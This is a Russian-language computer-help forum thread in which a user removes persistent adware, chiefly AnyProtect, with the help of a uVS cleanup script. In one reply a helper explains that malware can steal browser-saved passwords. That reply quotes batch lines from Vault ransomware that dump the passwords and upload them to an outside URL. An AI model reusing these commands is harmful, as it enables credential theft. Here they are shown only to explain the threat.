• Добро пожаловать на компьютерный форум Tehnari.ru. Здесь разбираемся с проблемами ПК и ноутбуков: Windows, драйверы, «железо», сборка и апгрейд, софт и безопасность. Форум работает много лет, сейчас он переехал на новый движок, но старые темы и аккаунты мы постарались сохранить максимально аккуратно.

    Форум не связан с магазинами и сервисами – мы ничего не продаём и не даём «рекламу под видом совета». Отвечают обычные участники и модераторы, которые следят за порядком и качеством подсказок.

    Если вы у нас впервые, загляните на страницу о форуме и правила – там коротко описано, как задать вопрос так, чтобы быстро получить ответ. Чтобы создавать темы и писать сообщения, сначала зарегистрируйтесь, а затем войдите под своим логином.

    Не знаете, с чего начать? Создайте тему с описанием проблемы – подскажем и при необходимости перенесём её в подходящий раздел.
    Задать вопрос Новые сообщения Как правильно спросить
    Если пришли по старой ссылке со старого Tehnari.ru – вы на нужном месте, просто продолжайте обсуждение.

Вступила в... Комету, амиго, иобит шредер, энипротект и еще пару радостей

Счастье

Счастье

Не очень хороший человек
Регистрация
1 Дек 2012
Сообщения
6,155
Реакции
933
Баллы
0
Вступила в... Комету, амиго, иобит шредер, энипротект и еще пару радостей

Доброго времени суток.
Недавно искала умную книжку, и пока скачивала ее, искала другую, отвлеклась (один раз) и случайно согласилась с распаковкой винрар-архива с расширением exe
И понеслаааась душа в рай, пока я делала кофе, эти подонки наустанавливали мне радостных приложений, панелек и прочей нечисти.
От иобит шредера избавилась, комету и амиго испепелила, а вот энипротект (то бишь AnyProtect) настырно живет своей жизнью. То есть удаляю его, а он около 23:00 каждый вечер уже четвертый раз все равно сам устанавливается.
Вроде и реестр позавчера чистила....
Как его прикончить, помогите советом! Заранее спасибо преогромное!)))
 
В гугле полно инфы на эту тему. Думаю счастье решило этот вопрос.
 
AnyProtect?
Это тот который весь на иероглифах?
Даже и не пытался его дезинсталлировать - мочил сразу процесс в памяти, затем HiJackThis-ом чистил автозапуск, потом реестр. Напоследок удалил сами файлы и папку.
Снес с первого раза.
 
правильнее будет все таки создать образ автозапуска системы из нормального или безопасного режима и рассмотреть все вредоносные запчасти, которые остались после вирусной атаки.

актуальную версию uVS можно скачать отсюда
https://content.wuala.com/contents/al_1963/avirus/Universal%20Virus%20Sniffer/files/uvs_latest.zip/?dl=1
как создать образ автозапуска
http://www.tehnari.ru/f150/t81269/
 
Нет, я его таки добила позавчера, но все почищу конечно, просто времени не было)))
Спасибо огромное за советы и ссылки!
Вот эти самоустанавливающиеся гадостные программы чисто гипотетически способны уводить пароли от сбербанка онлайн например? А то где-то прочитала и уже неделю боюсь им пользоваться...
 
если не сохраняете пароли в парольном менеджере браузера, или хотя бы ставите надежный пароль на доступ к сохраненным в браузере паролям, тогда вряд ли получится увести пароли. Если хранители паролей в браузерах без установленного мастер-пароля, то уведут запросто.

вот пример такой программы:
Browser Password Dump : Free Command-line Tool to Recover Login Password from Web Browsers

Сurrently it can recover stored web login passwords from following browsers.

  • Firefox
  • Internet Explorer
  • Google Chrome
  • Chrome Canary/SXS
  • CoolNovo Browser
  • Opera Browser
  • Apple Safari
  • Flock Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Comodo Dragon Browser
Нажмите для раскрытия...
после установки запускается из командной строки:
BrowserPasswordDump.exe -f "c:\passlist.txt"
Нажмите для раскрытия...
именно эта утилита используется злоумышленниками в энкодере ВАУЛТ, т.е. там помимо шифрования документов еще и уводятся пароли из браузеров.

if exist 065ed39e.exe (
"%temp%\065ed39e.exe" -f "%temp%\6eb7832c.a238703f"
wscript.exe //B //Nologo //T:120 "%temp%\3c2901e8.vbs" "%temp%\6eb7832c.a238703f" http://attached-email.com/v.php pf
del /f /q 065ed39e.exe
Нажмите для раскрытия...
 
~safety написал(а):
правильнее будет все таки создать образ автозапуска системы из нормального или безопасного режима и рассмотреть все вредоносные запчасти, которые остались после вирусной атаки.

актуальную версию uVS можно скачать отсюда
https://content.wuala.com/contents/al_1963/avirus/Universal Virus Sniffer/files/uvs_latest.zip/?dl=1
как создать образ автозапуска
http://www.tehnari.ru/f150/t81269/
Нажмите для раскрытия...
Что-то не выходит у меня их победить, что-то не так работает, вот мой архив
труба там, да? =(
Посмотреть вложение BIG-BANG_2015-07-06_21-53-19.7z
 
почти победили,
остались только левые стартовые, все остальное неактивно.

выполняем скрипт в uVS
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код: 
;uVS v3.85.25 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v385c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAM FILES (X86)\ANYPROTECTEX\ANYPROTECT.EXE
addsgn 1A74EF9A5583C58CF42B95BC14B97A0550880F3560E586788548043F30D2718B238FA6343E93DD412B430FDE4293898F7867481736DA73A7D2222FC3447B2A73 8 anyprotect

zoo %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\LOCAL\0000D88D-1435354935-3118-FFFF-BCEE7B4A2AEE\PNSVABEA.EXE
addsgn 7300F79B556A1F275DE775E6ED94361DE2CED8E6E96B5F78B63503F874C251B33627B3173E3D9CC92B807B8AF66609FA2E20FD0E279AB04625D4BCC38506CA82 59 Win32/Adware.ConvertAd.AQ [ESET-NOD32]

zoo %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\ROAMING\VOPACKAGE\VOPACKAGE.EXE
hide %SystemDrive%\PROGRAM FILES (X86)\CYBERLINK\POWERDVD10\AUDIOFILTER\CLAUD.AX
;------------------------autoscript---------------------------

chklst
delvir

delref HTTP://WWW.MYSTARTSEARCH.COM/?TYPE=HP&TS=1435764415&Z=5699905061E89471DA5FEF8G1Z2C6W7M7Q9Z3Z8E4T&FROM=CMI&UID=TOSHIBAXMQ01ABD075_93OZTBIJTXX93OZTBIJT

delref HTTP://WWW.MYSTARTSEARCH.COM/WEB/?TYPE=DS&TS=1435764415&Z=5699905061E89471DA5FEF8G1Z2C6W7M7Q9Z3Z8E4T&FROM=CMI&UID=TOSHIBAXMQ01ABD075_93OZTBIJTXX93OZTBIJT&Q={SEARCHTERMS}

delref HTTP://WWW.ISTARTSURF.COM/WEB/?TYPE=DSPP&TS=1435325953&Z=7AFE2104537C4A702864946GAZ5CEW3CAO7WAT6Z2T&FROM=KEY1&UID=TOSHIBAXMQ01ABD075_93OZTBIJTXX93OZTBIJT&Q={SEARCHTERMS}

; Remote Desktop Access (VuuPC)
exec  C:\Users\Наталья\AppData\Roaming\VOPackage\Uninstall.exe
deldir %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\ROAMING\ISTARTSURF
deldir %SystemDrive%\USERS\НАТАЛЬЯ\APPDATA\ROAMING\VOPACKAGE
deldir %SystemDrive%\PROGRAM FILES (X86)\ANYPROTECTEX

deltmp
delnfr
;-------------------------------------------------------------

restart
перезагрузка,
----------
+
далее,
можно сделать проверку в малваребайт
выполните сканирование (угроз) в Malwarebytes
 
Вот что пишет, ошибка какая-то...

Снимок.webp
 
Счастье, а ты точно весь текст скопировала?
 
Наталья, обнови версию UVS до актуальной.
У тебя версия 3.83.1, а скрипт приведен для uVS v3.85.25 http://dsrt.dyndns.org]
 
AlexZir написал(а):
Наталья, обнови версию UVS до актуальной. У тебя версия 3.83.1, а скрипт приведен для uVS v3.85.25 __________________
Нажмите для раскрытия...
угу, вот эта команда проверяет версию uVS
v385c
Нажмите для раскрытия...
поскольку постоянно добавляются новые команды, вносятся исправления, поэтому разработчик ставит заглушку, чтобы не применяли старые версии. На создание образа это не влияет (за исключением того, что какие то новые фрагменты данных могут не попасть в образ), а на выполнение скрипта влияет.

ссылку на актуальную версию я давал выше.
 
Войдите или зарегистрируйтесь для ответа.
Назад
Сверху